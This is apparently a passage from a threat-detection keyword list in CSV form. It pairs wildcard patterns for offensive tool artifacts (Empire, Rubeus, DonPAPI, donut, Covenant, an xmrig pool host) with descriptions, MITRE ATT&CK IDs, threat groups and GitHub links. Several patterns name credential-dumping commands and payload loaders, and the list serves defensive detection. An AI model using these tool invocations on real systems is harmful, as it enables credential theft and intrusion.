-*-Domain * -AllowDelegation *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*-Domain * -SPN *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Domain/CommandCollection*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*-domain_admins.txt*,offensive_tool_keyword,SilentHound,Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/layer8secure/SilentHound,1,0,N/A,N/A,5,430,44,2023-01-23T20:41:55Z,2022-07-01T13:49:24Z -*domain_analyzer.py*,offensive_tool_keyword,domain_analyzer,Analyze the security of any domain by finding all the information possible,T1560 - T1590 - T1200 - T1213 - T1057,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/eldraco/domain_analyzer,1,1,N/A,6,10,1831,259,2022-12-29T10:57:33Z,2017-08-08T18:52:34Z -*domain_analyzer-master*,offensive_tool_keyword,domain_analyzer,Analyze the security of any domain by finding all the information possible,T1560 - T1590 - T1200 - T1213 - T1057,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/eldraco/domain_analyzer,1,1,N/A,6,10,1831,259,2022-12-29T10:57:33Z,2017-08-08T18:52:34Z -*domain_hunter-v*.jar,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*domainDumpConfig*,offensive_tool_keyword,ldapdomaindump,Active Directory information dumper via LDAP,T1087 - T1005 - T1016,TA0007,N/A,N/A,Credential Access,https://github.com/dirkjanm/ldapdomaindump,1,1,N/A,N/A,10,970,176,2023-09-06T05:50:30Z,2016-05-24T18:46:56Z -*DomainEnumerator*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*domainhunter*,offensive_tool_keyword,domainhunter,Domain name selection is an important aspect of preparation for penetration tests and especially Red Team engagements. Commonly. domains that were used previously for benign purposes and were properly categorized can be purchased for only a few dollars. Such domains can allow a team to bypass reputation based web filters and network egress restrictions for phishing and C2 related tasks.This Python based tool was written to quickly query the Expireddomains.net search engine for expired/available domains with a previous history of use. It then optionally queries for domain reputation against services like Symantec Site Review (BlueCoat). IBM X-Force. and Cisco Talos. The primary tool output is a timestamped HTML table style report.,T1568 - T1596 - T1569 - T1593,N/A,N/A,N/A,Information Gathering,https://github.com/threatexpress/domainhunter,1,0,N/A,N/A,10,1380,291,2022-10-26T03:15:13Z,2017-03-01T11:16:26Z -*domainhunter.py*,offensive_tool_keyword,domainhunter,Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ,T1583.002 - T1568.002,TA0011 - TA0009,N/A,N/A,Phishing,https://github.com/threatexpress/domainhunter,1,1,N/A,N/A,10,1380,291,2022-10-26T03:15:13Z,2017-03-01T11:16:26Z -*Domaininfo/Domaininfo.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Domainpassspray*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*DomainPasswordSpray*,offensive_tool_keyword,DomainPasswordSpray,DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!,t1110 - T1114 - T1555,TA0006 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/dafthack/DomainPasswordSpray,1,1,N/A,N/A,10,1498,354,2023-09-22T22:13:14Z,2016-10-04T23:37:37Z -*DomainRecon*ridbrute*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*DomainRecon/ADCS*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*DomainRecon/BloodHound*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*DomainRecon/SilentHound*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*DomainRecon\ADCSServer.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*DomainRecon\DC-IPs.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*DomainRecon\ExploitableSystems.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*DomainRecon\OxidBindings.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*DomainRecon\Windows_Servers.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*DomainTrustDiscovery_PowerView.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*domcachedump.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*dome.py *,offensive_tool_keyword,DOME,DOME - A subdomain enumeration tool,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/v4d1/Dome,1,0,N/A,N/A,4,375,50,2022-03-10T12:08:17Z,2022-02-20T15:09:40Z -*DominicBreuker*,offensive_tool_keyword,Github Username,Github username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/DominicBreuker,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*DominicBreuker/pspy*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,1,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*donapapi -pvk *,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*donate.v2.xmrig.com:3333*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*DoNotUseThisPassword123!*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,0,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z -"*DonPAPI ""$DOMAIN""/*",offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*donpapi -credz *,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*DonPAPI.py *,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*donpapi_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*donpapi-master.zip*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*donut -f *.dll -c * -m RunProcess*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*donut -f c2.dll*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*donut* \DemoCreateProcess.dll *,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*donut.exe *.exe*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*DONUT_BYPASS_CONTINUE*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*donut-loader -*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Donut-Loader -process_id*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021.006 - T1059.001 - T1059.003 - T1047,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*DonutLoader(*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*DonutLoader.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*donut-maker.py -*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*donut-maker.py -i *.exe*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021.006 - T1059.001 - T1059.003 - T1047,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*donut-payload.*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*donut-shellcode*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*donut-shellcode*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*donut-shellcode*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*dos-over-tor*,offensive_tool_keyword,dos-over-tor,Proof of concept denial of service over TOR stress test tool. Is multi-threaded and supports multiple attack vectors.,T1583 - T1090,TA0040 - TA0043,N/A,N/A,DDOS,https://github.com/skizap/dos-over-tor,1,0,N/A,N/A,1,10,11,2018-07-21T01:44:41Z,2018-07-26T07:05:37Z -*dothatlsassthing*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*dotnet ./Server.dll*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*dotnet inline-execute *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*dotnet Inveigh.dll*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*dotnet ParseMalleable/ParseMalleable.dll*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,0,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*dotnet_serve_payload*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*DotNet2JSImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*DotNetArtifactGenerator.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*DoubleAgent.sln*,offensive_tool_keyword,DoubleAgent,DoubleAgent gives the attacker the ability to inject any DLL into any process. The code injection occurs extremely early during the victims process boot. giving the attacker full control over the process and no way for the process to protect itself. The code injection technique is so unique that its not detected or blocked by any antivirus.DoubleAgent can continue injecting code even after reboot making it a perfect persistence technique to survive reboots/updates/reinstalls/patches/etc. Once the attacker decides to inject a DLL into a process. they are forcefully bounded forever. Even if the victim would completely uninstall and reinstall its program. the attackers DLL would still be injected every time the process executes.,T1055 - T1059 - T1053,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Cybellum/DoubleAgent,1,1,N/A,N/A,10,1200,436,2022-08-24T10:32:36Z,2017-03-12T17:05:57Z -*douknowwhoami?d*,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 